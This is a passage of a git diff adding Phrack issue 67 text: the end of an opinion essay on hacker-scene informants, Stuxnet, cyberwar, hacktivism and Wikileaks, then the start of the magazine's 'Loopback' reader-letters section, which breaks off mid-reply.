+* Patrick 'eckis' Toey who faced a maximum sentence of twenty-two years, 
+reduced to a paltry five years by merit of supplying 'extensive 
+cooperation' to the authorities.
+
+* Breakout act Jeremy 'horse addict' Jethro -- evidently the star of the 
+case -- managing to not only narq out everyone he knew, but then managing 
+to find his Saviour in Our Lord Jesus Christ AND being fined less than 
+what he actually earned for his crimes (thus earning a nice little 
+profit); He also managed to get his sentence commuted to probation, on top 
+of everything else! Once again, this is solid proof that God is indeed on 
+the side of the just.
+
+* Albert 'soupnazi' Gonzales -- the sole failure here, scoring miserably 
+by still receiving a massive twenty-year sentence despite having 
+implicated everyone he knew up to and including his own grandmother
+
+-- and that's just for starters.
+
+The most disconcerting element in the entire show so far for anyone in any 
+way involved in any sort of criminal activity (or, indeed, anyone who 
+involves themselves in anything anywhere near anything resembling criminal 
+activity), is the startling comaraderie and friendly interaction between 
+international agencies - particularly Interpol and the FBI. Especially the 
+FBI.
+
+Recent international busts involving novel interaction between agencies 
+has lent heavy weight to previously unfounded concerns of privacy 
+advocates. The mere idea of a foreign national's being arrested overseas 
+and renditioned/transferred to the custody of American civilian agencies 
+purely on the basis of American testimony and evidence is enough to turn 
+the stomachs of anyone, and yet it seems to have gone largely under the 
+radar -- especially among American Citizens. 
+
+The pseudo-criminal actions necessitated by the various agencies involved 
+in order to bring down Gonzales would stagger even the most ardent 
+Republican waterboarder. To wit, the hard drives belonging to Ukrainian 
+carder Maksym 'Maksik' Yastremskiy were cloned during his trip to Dubai 
+and yet again when he was coerced into visiting someone in Turkey (all the 
+while while US agencies tried to tote the party line that they caught him 
+while he was taking "vacation" -- conveniently ignoring the fact that they 
+lured him to visit) and his movements tracked throughout Europe and Asia 
+over an extended period of time. We can be sure that Interpol had not the 
+gumption nor Ukrainian officials the interest (or resources) to bring 
+about this level of interplay. With the evidence in hand, surely only the 
+FBI can be to blame? The Turkish officials got to crow about a 30 year 
+prison sentence -- in a Turkish prison, no less -- and the US got to cross 
+one more name off their "to do" list, case closed, job done -- success all 
+around.                                       
+
+Further confirmation of such a hearty and hale level of cooperation was 
+provided just this past October by the FBI, who affirmed that the break-up 
+of a major Zeus botnet ring was the result of an "unprecedented" 
+partnership between the FBI and police forces around the world including 
+the UK's Metropolitan Police, the Security Service of Ukraine (SBU) and 
+the Netherlands Police Agency. So far the international Operation Trident 
+Breach effort has yielded more than 150 arrests across the US, the UK and 
+Ukraine, the FBI said. One can assume that's only "so far" and that once 
+the narq ball gets rolling, yet more waves of arrests -- and yet more 
+international cooperation -- will commence in earnest.
+
+Perhaps you are wondering what this has to do with you, at this point. 
+Perhaps you ARE merely doing your job as a whitehat, researching these 
+transglobal "criminal conspiracies", reversing malware, sticking to only 
+machines you have permission to access, maybe even contributing to some 
+open source projects and communicating giddily about 0day bugs on bugtraq 
+and full-disclosure, or releasing exploit information on your twitter 
+feed; after all, in this wired global age, the opportunities for 
+collaboration are indeed unprecedented. But where does one's level of 
+responsibility for the use of one's research end and begin? Dig Sklyarov 
+and the DMCA brouhaha. Witness certain unnamed Linux distros suddenly 
+being unwilling to allow tools such as SQL Ninja to be included in their 
+source code repositories.
+
+At what point might YOUR code be considered a munition? At what point 
+might your totally legitimate work as a whitehat (or greyhat, or what have 
+you) researcher, or pentester, or even systems administrator or website 
+developer be called into question? While it is certainly difficult to 
+argue that putting identity thieves behind bars is a quote-unquote "bad 
+thing", it is also difficult to refute that code itself is being seen as a 
+munition (just as crypto was not so long ago, and probably will be 
+increasingly so again, as time passes and the reins tighten up in only 
+somewhat predictable ways).
+
+If you mistakenly introduce an error into your codebase at work and it 
+creates a security hole, can you prove it was not intentional? There 
+really are no guarantees. An overly aggressive legal system will at the 
+very least threaten to steal time, money, resources, and quite probably 
+your reputation. 
+
+If you're very unlucky you might wind up in jail, or in trouble for 
+something someone you know was involved in, in hopes that you will be the 
+next hacker willing to daub in his (or her) mates to be set free, thus 
+maintaining the cycle of narqing and providing an always-revolving door of 
+the Usual Suspects to lay blame to. That's not even including the Patriot 
+Act and wiretaps (an issue pretty much deserving of its own article some 
+other time). 
+
+The exposure of Google's Street View Wifi data gathering fiasco is likely 
+only the tip of the iceberg -- what we were told was the accidental coding 
+error of a single engineer (who probably will wear that virtual scarlet 
+letter on his resume for life). And yet again, in that case, other 
+countries were first to protest; only lately has there been a strange and 
+questionable desire TO have those records retained -- for what purpose who 
+only knows.
+
+The question to wrap all of this up with, here, probably isn't "Does it 
+affect you now?" (unless you are indeed a blackhat, in which case, no 
+doubt, this will impact you tremendously). The question is "can you be 
+sure it never will?"
+
+
+--[ 2. Stuxnet, Cyberwar, Hacktivism and Political Hacking
+
+It's no secret that, with the US economy in a state of planned poverty, 
+conventional sense.  But the growing speculation, that Iran's nuclear 
+power plant at Bushehr will turn into a weapons program, is a timely 
+excuse for governments to exercise their newfound cyber warfare tactics.  
+Iran believes Stuxnet was intended to derail its nuclear ambitions; and 
+"analysts" expect us to believe that a string of numbers, the name of some 
+shrubbery, futbol domains, and weird 2012 shit... somehow indicates Israel 
+was behind it all.  The reality is probably this: as much as Israel's 
+super star hacking squads would love to take down Bushehr, Russia is 
+standing in the way, defending its plan for a return on investment.
+
+Stuxnet represents just one of a few big events in this arena since last 
+issue. We've also had Aurora and that whole Google scandal in China.  
+Hildawg has been bitching about China from the start, and it came as no 
+surprise that pressure would be put to bear on big companies, like Google, 
+to defame China's government in the midst of a GFC.  More recently, 
+Europe's cyberwar simulation has been hailed as a success, with countries 
+across the EU learning to defend against over 300 attacks.  This marks 
+another milestone in the EU's attempt at coordinating intraregional 
+cybercrime investigations.  Across the Atlantic, USCYBERCOM has finally 
+gone live.  While governments prefer to keep their military hax a secret, 
+there exists a necessity for them to demonstrate their power.  Welcome to 
+a whole new wave of terror, hackers.
+
+The majority of high profile attacks in the last year show a trend towards 
+highly skilled and targeted hacks that take a lot of time and/or money to 
+develop.  In these cases there is minimal collateral damage, months may 
+pass before detection, the hackers are anonymous, and the vector is 
+unique.  While these are still large-scale attacks, they're not intended 
+to affect the entire internet -- just a select few major players, and 
+sometimes only for a short while.  As corporations and governments throw 
+big bucks into cyber warfare we're going to start to see some of the big 
+names in the IT industry get left behind.
+
+The continued DDoS of Burma, in the lead-up to its first election in over 
+20 years, showed a recent and unwelcome return to stupidity and ignorance 
+at a rate of 10-15gbps, easily dwarfing the Estonia DDoS of 2008.  Amnesty 
+International had been working hard to get radios into Burma, so that 
+people could keep up with the election news from across the border.  Days 
+after the election, their Hong Kong website was compromised and visitors 
+were attacked with an IE exploit that Microsoft knew about, but blatantly 
+refused to patch early.
+
+On the same day that the Burma DDoS began, the Iranian Cyber Army 
+announced its "botnet for hire", though it is rather unlikely that there 
+is a substantial link between the two.  Their admin system is some kind of 
+honeypot, their stats are fake, and surely the very idea should have 
+screamed of an obvious trap.  But as the news started to spread, bloggers 
+began recycling news media, and slower reporters started relying on those 
+bloggers, until we started coming across reports that ICA was renting out 
+"the same botnets that took down Twitter and Baidu".  Uh, sorry?  Last 
+time I checked, social engineering a dude at Register.com didn't require a 
+botnet.  
+
+But hey, maybe there is a botnet, or at least one in development.  It's 
+hardly as though ICA are the first to do so.  But their treatment by news 
+media is ridiculous.  I mean, if these guys really are an "army" then just 
+where were they when Honker struck out in retaliation for Baidu's 
+defacement earlier this year?  Unfortunately the media still clings to 
+them because of a handful of high profile defacements.  And because they 
+tend to pop up every time something big happens, some journalists actually 
+think these kids are an officially sanctioned military force that reports 
+to Ahmadinejad himself!  I don't believe, for a second, that they're even 
+Iranian to begin with.
+
+On the related note of poor-man's hacking, we're also seeing a rise in 
+grassroots hacktivism.  Social networking sites are making it increasingly 
+easy to inspire angry mobs of ordinary computer users to take part in a 
+DDoS by clicking a link.  Years ago we laughed at those kinds of methods 
+(remember the cDc's hacktivismo?).  But we're not on dialup anymore, and 
+there's not a lot you need to get your own "human-net" started -- just a 
+persuasive cause and a handful of idiot-proof programs.  LOIC is popular 
+for this, as are websites that send GET requests in iframes over and over 
+and over.  Next thing you know, there's thousands upon thousands of stupid 
+tweeters, staggering forth like something out of Resident Evil.  This 
+isn't even including the more normal botnets that use sites rely on 
+Twitter for commands.  Throw that into the mix and Twitter becomes some 
+kind of pluralistic middle-class pseudo-political force to be reckoned 
+with.  Law enforcement seem to just give up in those cases.  Too many 
+people to chase.  Not enough resources to prosecute them all.  The most we 
+see is the instigators of these human-nets being hunted down.  As the RIAA 
+and MPAA attacks showed us, Anonymous ain't so anonymous when they plan 
+their attacks in the open, in front of feds, on 4chan and Darknet.
+
+The trend toward military-directed cyber attacks is prompting some 
+academics to call for a change to the laws that regulate the conduct of 
+hostilities in war.  They are questioning whether a country can remain 
+neutral in a cyber war if the data carrying the attack travels along that 
+country's pipelines.  Some militaries insist that for hackers to qualify 
+for "prisoner of war" status, these geeks must wear a special hacker 
+uniform and carry a sidearm (I like to think this uniform would look like 
+TRON Guy).  
+
+And then there's the question of whether something like Stuxnet can be a 
+legal impetus for conventional war.  The real beauty of Stuxnet isn't just 
+in the code (as specialised and 0-day as it may have been) -- it's also in 
+the attack vector.  If you conveniently lose your malicious USB key in a 
+parking lot, and some "unscrupulous person" picks it up and decides to use 
+it at work... YOU are not committing an attack -- at least not directly 
+(one could argue, after all, that they had no business picking up the usb 
+key in the first place).  Moreover, philosophical arguments aside, if 
+you're a civilian, the likelihood of you being charged with anything is 
+extremely remote. Add all of this to the essential argument that hacking 
+cannot be considered an act of war necessitating self-defense unless the 
+hack can be compared to a substantive and conventional military attack, 
+and conventional arguments are essentially thrown out the window. In other 
+words, in the case of Stuxnet, while Iran recognises there was espionage, 
+and possibly an intentional attack, the worm was not an "armed attack" 
+sufficient to qualify self-defense under the UN Charter.
+
+In sum, if the events occurring since the last issue has been anything to 
+go by, the next decade will see a growing disparity between the nature of 
+high-profile hacks, but at the end of the day the bulk of it is the same 
+old same old, with some new shit thrown in.  Militaries are fast becoming 
+a cyber-force to be reckoned with, but in the absence of laws to regulate 
+their actions, don't expect bombs to fall as a result.  While it is most 
+probably that the recent spate of uniquely targeted high-profile attacks 
+will go unpunished, what we can expect is the government to play an 
+increasing role in regulating the Internet and hunting down ordinary 
+hackers in the name of a "war on cyber terrorism".
+
+
+--[ 3. Wikileaks and whistleblowing 
+
+But what of Wikileaks? While it is undeniable that it has had some impact, 
+one must ask oneself if we are not just raucously accepting as a date to 
+the prom the only girl who asked us out and considering ourselves lucky to 
+have found anyone at all. One could argue that when a society needs a 
+hero, someone will always be willing to show up fighting, but the same 
+could be said of most movements, even including the upstart 'Tea Party' 
+being cawed about on Fox News to cheers by the same people who would have 
+voted for Obama if they'd been Democrats instead of Republicans. Perhaps 
+it's unfair to tilt this article so specifically in the direction of the 
+US -- after all, Wikileaks has shed some light on some tremendously 
+important stories in the three or four years since its inception -- but 
+it's hard to argue that 2010 was the year that Wikileaks came to true 
+nation-wide attention, due in no small part to a certain "redacted" video 
+going by the sobriquet "Collateral Damage", and then fueled by the 
+document dumps ostensibly leaked by US insiders concerning Iraq and 
+Afghanistan that came not long thereafter.
+
+Yes, we have a responsibility to make information acceessible, or at least 
+make the knowledge of how such information is stored and used more public, 
+less draconian and redolent of a country poised to curtsy/bow to 'Mein 
+Fuhrer' but we also have a responsibility to treat that information with 
+respect, and more importantly to be able and willing to filter that data 
+through the sieve of common sense and reason: Data should be valuable 
+because it is valuable data (and in some cases the releases by Wikileaks 
+have indeed been valuable data) and not valuable simply by the reasoning 
+that "they don't want us to have it." 
+
+By the same token, sometimes the very act of sticking the proverbial 
+middle finger up at The Man serves as a call to arms -- or at the very 
+least a rate limiter: A way to urge the current Powers That Be to think a 
+little more before trying to instituting even further privacy eroding 
+measures. Conversely, it is all too easy for any country to consider any 
+"leak" -- righteously whistleblowing or not -- as an act of war, or an 
+excuse to add a few zeros to a department's line budget.
+
+And there's something else we all need to be thinking about:
+
+Every country, every war, every movement has secrets. We may tell 
+ourselves that information wants to be free, but freedom comes with a 
+price and some secrets are GOOD secrets. More importantly there OUGHT to 
+be some secrets in the world.
+
+To completely submit to Wikileaks' vision is almost more akin to Big 
+Brother than anything the US government -- or any other government -- 
+could possible create on its own: A culture where your every move may be 
+exposed, your every thought may be tallied, your every minutiae published 
+for the whole world to see, in a world where Google gambols giddily in the 
+grasses of greed and Facebook and Twitter announce to the world your every 
+move to a perceived audience of enthralled onlookers all willing to say 
+'you!' when you say 'ah, me!'. In a way we're already most of the way 
+there, and that's a very dangerous thing. When your baseline gets reset 
+and you don't REALIZE that your privacy is being invaded, then the great 
+big "They" has already won -- and you have just let yourself do the dirty 
+work for Them.
+
+One could argue that if PFC Manning did indeed leak what has been 
+attributed to him, he may have done a heroic thing, but the fact that he 
+may have also broken a trust that he covenanted into in advance with the 
+US government is difficult to completely discount. The Manning case having 
+received the attention it has gotten this year has brought up a lot of 
+grey areas in peoples' political belief systems, but it has also begged 
+the question: What *is* "whistleblowing" and what is "disloyalty"? What is 
+"patriotism" and what is "narqing"? When can one trust one's judgment 
+about another person's true intentions and is it truly as cut-and-dry as 
+we all wish it would be? Adrian Lamo snitched, but it is always possible 
+that he thought he was protecting himself or his country even as he may 
+have also been trying to cobble together some newfound publicity for a 
+receding career that has been inarguably past its prime for years now. At 
+some level this isn't about government or whistleblowing or privacy -- 
+it's about society and about interpersonal trust, and perhaps that is 
+where things get the murkiest. Naive or not, trust is dealt out 
+increasingly to total strangers on the internet. One could argue that 
+Manning, if indeed that was Manning, was naive in trusting a veritable 
+stranger, but most of us do this on a regular basis now; the difference 
+here is, Manning paid.
+
+Without an explicit agreement of nondisclosure one cannot truly and 
+totally scorn somebody for "squealing", but by the same token our very 
+society has been built up on such simple and implicit bonds of trust: I 
+will not hurt you, I will not steal from you, I will not betray you. I may 
+not agree with what you do, but I respect your choices as an individual. 
+At what point does that trust need to be broken off? Some secrets are 
+good, if they contribute to the greater good of society -- and that goes 
+*both* ways -- at times in favour of the individual, at other times in 
+favour of government. As a species we always want to root for the Underdog 
+(and nowhere is this more true than the US, perhaps), but given the fast 
+fluxing nature of the Internet, who the Underdog is can flip at a second's 
+notice: At first Wikileaks was the cause celebre of people everywhere, 
+then came the backlash. All movements have backlashes, and Wikileaks was 
+bound to not be the exception.
+
+Perhaps one reason so many scorn Wikileaks has to do with the closed-book 
+nature of a site so overtly and devoutly espousing transparency; at some 
+point it becomes difficult not to interpret all sides as playing with 
+similar playbooks. But it's difficult to win at poker at a table where 
+everybody knows your cards, especially when the rest of the players have 
+bankrolls that far eclipse your own. Again, the question arises: When is 
+transparency necessary, and when is secrecy a requirement to make any 
+progress at all? On the one hand, one must worry about too much 
+transparency; on the other hand, one must worry about too much lurking in 
+the shadows. In the past we had journalists to expose corruption; now it 
+is often journalists themselves fighting off corruption charges, hiding 
+facts, skewing evidence.
+
+It's incredibly difficult to deny that some transparency, and indeed 
+Wikileaks itself, can have a positive impact -- and it's hard to imagine a 
+world where SOME sunshine shouldn't be shed; The trick here is to remember 
+that such increased levels of exposure demand we be a more responsible, 
+measured animal -- something as homo sapiens we have really never learned 
+how to do or be. 
+
+There is no way to shove the genie back into the bottle, and old rumours 
+on the Internet never really die -- they just get archived til someone 
+else manages to come along and dig them up from their temporary graves. 
+This holds great promise for the future of integrity, but it also creates 
+issues when the possibility of outright falsehoods are introduced, 
+especially through an anonymous third party, or in cases where a split 
+exists between haves and have-nots; who really has time to monitor their 
+reputation online to that level? And if someone does besmirch your name, 
+what can be done?
+
+If your data shows up on a whistleblower site care of a third party, then 
+it also becomes yet another way to show a display of power: The 
+Vice-Presidential hopeful breaks the rules -- nay, the law -- and walks 
+free while the college student who guesses at her password gets sentenced 
+to a year of supervision or prison. If there is to be light shed, then it 
+should be an equally penetrating (and perhaps softer) light -- not a light 
+meant to shine in the victims' faces and hide the face of the perpetrators 
+-- especially when the label of 'victim' and 'perpetrator' is so murky and 
+grey (as in the Palin case; one could argue both sides committed some form 
+of fault).
+
+Julian Assange likes to say 'speak truth to power" but this is a tall 
+order; to first be able to speak ANYTHING to power, you must basically 
+gain the ear of the powerful, or you just get thrown
+into an eddy, left to whirl around with a bunch of kooks and nutjobs (as 
+any federal agent handling walk-ins will likely attest to, and too, so 
+must whistleblowing sites contend with; with fame
+comes your own raft of nutjobs to weed out).
+
+It'd be hard to deny that whatever else Wikileaks has accomplished in the 
+past year, it has gotten someone's attention. Whether that will be a good 
+thing or a bad thing remains to be seen... But one imagines any call to 
+arms must bring about some force for good, even if that force is something 
+as simple as a renewed spirit of vigour and willingness to be involved 
+among an otherwise sluggish populace juggling its own sense of 
+powerlessness in a country demanding what essentially constitutes sexual 
+assault merely in order to board an airplane. To make an omelet you must 
+first break some eggs; To create a change you must first gain the ear of 
+not just power but the people itself -- and then you must charge them with 
+the duty to act.
+
+The true collateral damage may wind up being Manning himself, here; 
+basically judged guilty already, his name forever stored, his 
+acquaintances being hassled, his personal life bared open to the
+ world, he serves as both an example of what to strive for and a 
+cautionary tale for a new age. What the future holds for him remains to be 
+seen, but with any luck he will receive a fair trial by a jury of his 
+peers -- if any such people even exist.
+
+Wikileaks may not be perfect -- in fact, it may be deeply flawed -- but 
+for now it's probably all we're going to get. And we should probably be 
+grateful for it -- but wary. Always wary. The danger of mixing the message 
+up with the messenger is always great, and there is no real way for any 
+whistleblowing site to always be 100% correct. Even governments have an 
+incredible amount of difficulty verifying the veracity of any information 
+or separating rumours from fact; to put this level of blind trust in a 
+volunteer organization with no oversight is bound to be fraught with a 
+whole host of issues we haven't seen the likes of yet... For instance, 
+what happens when a non-governmental entity views it as a potential source 
+of information? Once any whistleblowing site gets information, it is out 
+there; what is done is done; At this point, false flags and disinformation 
+is also an issue; the possibility of tricking any whistleblower site to 
+publish false information would destroy not only its credibility if found 
+out but possibly be used to forward some governmental or non-governmental 
+party or agenda. Additionally, to believe everything that any organization 
+says is as short-sighted as believing everything your government tells you.
+
+Ultimately your conscience will have to be your guide -- and likely no two 
+consciences will ever completely agree, especially about anything as 
+at-times agit prop as Wikileaks can be, or as secretive as governments 
+have always been.
+
+
+--[ 4. Scene Events: the Final Word
+
+To be sure, many other events have taken place this past year and a half 
+(the whitehat-vs-blackhat wars forever raging (cue zf05 and the 
+never-ending arguments about disclosure-vs-nondisclosure); the global 
+emergence of a harsher, more organized form of cybercrime (and the many 
+busts that resulted);  etc, etc), but several basic themes emerge: There 
+has been fraud -- but there has always been fraud. There have been 
+invasions of privacy -- but there have always been invasions of privacy. 
+There have be governments overstepping their bounds -- but there have 
+always been governments overstepping their bounds. That doesn't make any 
+of it acceptable, but it also doesn't make any of it new -- nor does it 
+give any of us an excuse to pretend it has nothing to do with us (no 
+matter where you reside or what flag you fly (or choose not to fly, 
+whatever the case may be)). If anything, there has been an amplification 
+of all of the above, but none of it is truly 'new'. Read past issues of 
+Phrack: All of the above has existed in some form or another, just on a 
+smaller scale. It's still existed.
+
+Judging by the drive for wealth or fame or infamy displayed in so many of 
+this year's stories, it bears mentioning that we cannot let a few key 
+players make us forget how important it is to treat technology 
+responsibly, reasonably -- to love it, to hack it, to, please, take risks, 
+but to do so with heart
+
+-- with CONSCIENCE --.
+
+In the end it all starts and ends with you.
+
+[EOF]
+
+
+
diff --git a/phrack67/4.txt b/phrack67/4.txt
new file mode 100644
index 0000000..3cec251
--- /dev/null
+++ b/phrack67/4.txt
@@ -0,0 +1,605 @@
+                              ==Phrack Inc.==
+
+               Volume 0x0e, Issue 0x43, Phile #0x04 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=------------------------=[  L O O P B A C K  ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[  Phrack Staff  ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+    Hi there!
+
+As you may have noticed, the Loopback tradition had been lost for years. 
+The previous staff decided to remove it as it was a little bit hum... let's
+say 'teasing' ;>
+
+Can you remember Duvel's remark on that fact?
+
+A brief history of the Underground scene (p64):
+
+                                    ---
+Take a look at the Phrack Loopback responses during the first 10 years
+to the recent ones. A much higher percentage of responses are along the
+lines of `you're an idiot, we at Phrack Staff are much smarter than 
+you.`...
+                                    ---
+
+Well good news folks, it's back. We chose to resuscitate it as:
+    - it's fun. YES IT IS (especially considering the fact that people
+      were not aware of its coming back)
+    - we promise not to be too much of bitches (or so they hope) ;>
+    - we want YOU to share with the Underground. As such for the next issue
+      you are very welcome to send us mails of all kind
+    - we are poor on philes for this issue (just kidding BTW, we're just
+      elitist arrogant bastards)
+
+We humbly apologize to all guys we never answered to neither by mail nor 
+through this phile because we suck at filtering our spam (this could
+_absolutely_ not be a laziness issue, right?)
+
+Time to find out who wanted to say hello.
+
+    -- The Phrack Staff
+
+
+|--=[ 0x00 - From India ]=-----------------------------------------------=|
+
+Subject: Re: Null Conference and Security Community
+From: Prashant KV <bug@null.co.in> 
+Cc: Marketing <marketing@null.co.in> 
+
+    [ Marketing? :> ]
+
+Hi,
+
+    [ Hi Prashant ]
+
+[...]
+
+Null is a community of enthusiastic hackers and security professionals in
+India. It all started with a motive to promote advance security research in
+India. 
+ 
+Null has immensely contributed in nurturing young hackers and providing a
+platform to amateurs. Over the years, the Indian industry and several
+government organizations have benefited from the expertise of Null members.
+Be it creating awareness among Indian developers or defending Indian 
+Infrastructure, Null members are everywhere. 
+ 
+As a part of continued efforts in creating awareness among our enthusiasts,
+Null conducts an annual conference in carnival city of Goa called Nullcon. 
+Hackers, talks, workshops, party and booze invites you, 25-26th feb 2011 
+Goa India.
+
+   [ Thanks to the Null members, we have an interesting paper on the Indian
+     hacking scene. Kudos. Please have a look at their websites:
+
+     http://null.co.in / http://nullcon.net/cfp-nullcon-dwitiya (CFP)
+   ]
+ 
+Regards
+Prashant 
+
+|--=[ 0x01 - Th1nkG33k ]=------------------------------------------------=|
+
+Subject: Legion of Doom T
+From: Ted Mosby
+
+    [ Hi Ted. Is Barney with you? ]
+
+Is this shirt still available? I know it's from the early 90s, but I had 
+one of these and I've always wanted to get another.
+
+(For a limited time, the original is back!)
+
+"LEGION OF DOOM  --  INTERNET WORLD TOUR"
+
+The front of this classic shirt displays "Legion of Doom Internet World 
+Tour" as well as a sword and telephone intersecting the planet earth, 
+skull-and-crossbones style. The back displays the words "Hacking for Jesus"
+as well as a substantial list of "tour-stops" (Internet sites) and a quote 
+from Aleister Crowley.
+
+    [ Dammit. We didn't even know it existed. Sorry bro, no clues on this 
+      one. ]
+
+
+|--=[ 0x02 - Drug abuse is bad ]=----------------------------------------=|
+
+Subject: Binary is Hacked!!!
+From: killerzerosones@null.net
+
+555555555 55 5555 55 55555555 55555555 55 55
+55 555 55 55 55 55 55 55 55 55 55 55
+55 5555 55 55 55 55 55 55 55 55 55 55
+55 555 55 55 55 55 55 55 55 55 55 55
+555555555 55 55 55 55 55555555 55555555 555555
+55 555 55 55 55 55 55 55 555 55
+55 5555 55 55 55 55 55 55 55 55 55
+55 555 55 55 55 55 55 55 55 555 55
+555555555 55 55 5555 55 55 55 5555 55
+55 555555555 55 55 55555555 55555555 55 55555 55555555 55555555
+55 55 55 55 55 55 55 55 55 5555 55 55 55
+55 55 55 55 55 55 55 55 55 555 55 55 55
+55 55 55 55 55 55 55 55 55 55 55 55 55
+55 555555555 55555555 55555555 55 555 55555555 55 55
+55 55 55 55 55 55 55 55 55 55 55 55 55
+55 55 55 55 55 55 55 55 55 555 55 55 55
+55 55 55 55 55 55 55 55 55 5555 55 55 55
+55 555555555 55 55 55 55 55555555 55 55555 55555555 555555555
+
+Binary is setup as 0's and 1's and there are quite a few encodings that 
+beat binary(machine language)...
+256 128 64 32 16 8 4 2 1
+0 = .
+1 = .5 = 2 = 1
+1 0 = 5
+1 1 = 5.5 = 52 = 26 = 13
+1 0 0 = 50 = 25
+1 0 1 = 50.5 = 502 = 251
+1 1 0 = 55
+1 1 1 = 55.5 = 552 = 69
+1 0 0 0 = 500 = 250 = 125
+1 0 0 1 = 500.5 = 5002 = 2501
+1 0 1 0 = 505
+1 0 1 1 = 505.5 = 5052 = 2526
+1 1 0 0 = 550 = 275
+1 1 0 1 = 550.5 = 5502 = 2751
+
+When .5 is replaced with 2 keep halving number until prime without turning
+number into a decimal for a faster encoding with the 0-9 numeral system. So
+basically half all the numbers until the next half becomes a decimal I.e. 
+being prime. This saves in space approximately 98 numerals per 100 places 
+compared to machines language.
+
+    [ Same post was found on: 
+      http://mathfax.com/emraised-to-the-infinite-9craised-to-the-infinte-9
+      and
+      http://www.mymathforum.com/viewtopic.php?f=13&t=12988
+    
+      You're crazy man :> Well this give us the hint that at least one guy 
+      is reading our drug-related papers. ]
+
+
+|--=[ 0x03 - Dating ]=---------------------------------------------------=|
+
+Subject: CFP 67 and staff
+From: Larry
+
+Hello,
+
+Is there any place where I can talk to the staff, like it used to be in the
+past?
+
+Is the old IRC still working?
+
+    [ Unfortunately it's not. But rumor says we may be found on other IRCs.
+      If you know a guy who knows a guy who knows a guy then maybe... ]
+
+Regards.
+
+
+|--=[ 0x04 - Interesting thoughts ]=-------------------------------------=|
+
+Subject: ANTISPAM
+From: Rachel Peek <rachelpeek@live.com>
+
+    [ We sent you a mail Rachel. Having no answers, we assumed we could 
+      publish it as it currently is. ]
+
+Normally I would try to be convincing, but I'm not feeling it right now. 
+The thing is, I recently wrote a sort of article on my personal opinions 
+about the government. I don't really know if it's the kind of thing you're 
+looking for, but I figured I would send it in anyway. Look down.
+
+The thing with mental disorders is you never know if what you're feeling is
+real. You don't know if you've made it all up in your head, if you just 
+added all this stress into your life for nothing. But it feels real. As 
+real as anything can, and it's scary as shit. It raises the questions: 
+Which part of the brain is in charge of sanity? Or the more often times 
+more prominent insanity? What causes us to say the things we say? What 
+tells us to hurt the ones we hurt? What compels us to take the actions we 
+take? WHY DO WE DO THE THINGS WE DO? This question has yet to be answered 
+after all of these years. I think it's because we're too busy telling each 
+other what to do, and now our heads are lost up the parts of our asses 
+where maps aren't allowed. I am living proof of this stupidity. I don't 
+know where my thoughts come from. I just know they're there and continue to
+taunt me with their daily attendance. They will cause me to do things that 
+will make others wonder. They will ask the inevitable question "Why?" I've 
+just stopped answering. This is because my answer will never be good 
+enough. I never seem to have the appropriate reasoning for my actions. For 
+lack of a few better words, I just do shit. I do what I want. In today's 
+society, this is a crime. In order to become a model citizen of the proud
+U.S.A., you must never, ever do what you want to do. You are to do what you
+are told and ask no questions. Not that it matters. You'll only be answered
+with bullshit about how it will benefit you in the end. Take your 
+modern-day education program for example. they provide you with a selection
+of subjects to choose from, all of which have been watered down by the 
+government to shield our innocent eyes from our country's mistakes and the 
+fact that the world is a shitty place thanks to our existence. This is not 
+easily done though, so they must distract us with ridiculous 
+extracurricular activities that will be of no use to us ever in our lives. 
+And they know it. So while we're busy learning how not to break an 
+unfertilized chicken ova with a sharpee face, they're watching us. They ask
+themselves,
+
+"How will they react to this?" 
+
+"What will happen if we do that?"
+
+They're searching for glitches, just like you would on a computer. You make
+one wrong move, you take the tiniest step out of line, and they'll 
+immediately make an attempt to "correct" it. How dare you be your own 
+person? How dare you make your own decisions? You must fit the mold, and if
+you don't, you better believe they're trying their damnedest to shove you 
+into it. They want to catch us early you see. Before we realize how to 
+think for ourselves. They tells us how to walk, stand, eat, sit, write, 
+sing, THINK. And we eat the shit up. Why is this? Because if we don't, we 
+are shunned. We are not like the others. We are alone. The "Man" depends on
+our loneliness. The homosapien hates to be alone, and they are aware of 
+this. Most people will do anything to avoid it, including shutting off 
+their brains to fit in. So you fall in line and you follow these rules. You
+might ask why they are there at all, but you will never be answered. You 
+will simply be given an ultimatum. "To get a good job and be successful" 
+Another way to put this would be, "Do exactly what you're ordered to or 
+have a miserable life" But success is relevant...to some at least. 
+Society's definition of success is money. You go to school to get a job to 
+make money to spend money to run out and need it again. You get trapped in 
+the cycle. Well what if your definition of success is happiness? You've 
+most likely thought to yourself, "Oh shit" This is due to the fact that you
+now know you are living in a world you don't belong in. You are living in a
+world where happiness IS money, and no one will believe otherwise. And so 
+you need money to get by. You have to delicately touch the filthy stuff. 
+You have to carry it tenderly in your pocket, making sure it's in a safe 
+place, meeting all of it's needs, caring for this shit with wasted love. 
+And you get a job to acquire more. You get up every morning and you follow 
+the speed limit up the road, and you buy your coffee that is made from 
+beans picked by people who can't afford to taste it, and you walk into a 
+building with big, clean windows and detailed columns cleverly placed to 
+disguise the boredom that awaits you inside. You will sit. And you will 
+sit. You will sit all day long in one of those swivel chairs that allow you
+to do your pointless work at a slightly quicker pace by cutting out all of 
+that rigorous head turning. You do this because you want to get out of 
+there as soon as possible. You want to go home and eat your feelings. You 
+want to stare at that black box as it tells you you are ugly. You are 
+stupid. You are fat. You are not good enough. You are not the best. Be the 
+fucking best. But you can't be. You never will be. You don't have time. 
+You're so busy following that same goddamn schedule every day you don't 
+have a single second to breathe and it's cutting the circulation off to 
+your brain. You can only think what you've been taught to think and you'll
+do so until you're on your deathbed trying to reflect on the life you led. 
+Trying to remember something beautiful the way they do in the movies. But 
+all you see are white button-downs and digital clock numbers, glowing 
+computer screens and stock numbers. you have wasted your life and you might
+as well be a cardboard cut-out of yourself. It's a sad thing to die a human
+being.
+
+    [ Thanks for this Rachel. ]
+
+|--=[ 0x05 - Translation proposal ]=-------------------------------------=|
+
+Subject: Translation of phrack magazine 
+From: Robert Langdon <langdonmail@gmail.com>
+
+    [ Audrey Tautou <3 ]
+
+Hi Phrack staff,
+
+I'm an italian university student of Computer Science. I read many article  
+of your magazine and I'm vary interesting about your magazine.
+
+In this days, I think if is possible to translate your articles (not all
+obviously) in italian language ... and I don't understand which is the  
+distribution or publish license of yours article. The intent is to spread   
+your knowledge to italian guys. Can I translate one or more article?
+Obviously, the translation is one-to-one, with the same references, the same
+authors and so on.
+
+    [ As stated many times we do not support officially translations of 
+      Phrack and that would be essentially because translations (even from 
